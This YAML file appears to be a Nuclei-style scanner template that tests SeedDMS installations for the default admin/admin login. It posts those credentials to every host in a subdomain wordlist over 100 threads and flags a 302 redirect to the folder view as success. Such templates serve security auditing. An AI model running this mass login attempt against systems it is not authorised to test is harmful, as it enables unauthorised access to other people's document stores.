id: seeddms-default-login

info:
  name: SeedDMS Default Credential
  author: alifathi-h1
  severity: high
  reference: https://www.redhat.com/sysadmin/install-seeddms
  tags: default-login,seeddms

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        POST /op/op.Login.php HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        
        login=admin&pwd=admin&lang=
    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - 'Location: /out/out.ViewFolder.php'

      - type: status
        status:
          - 302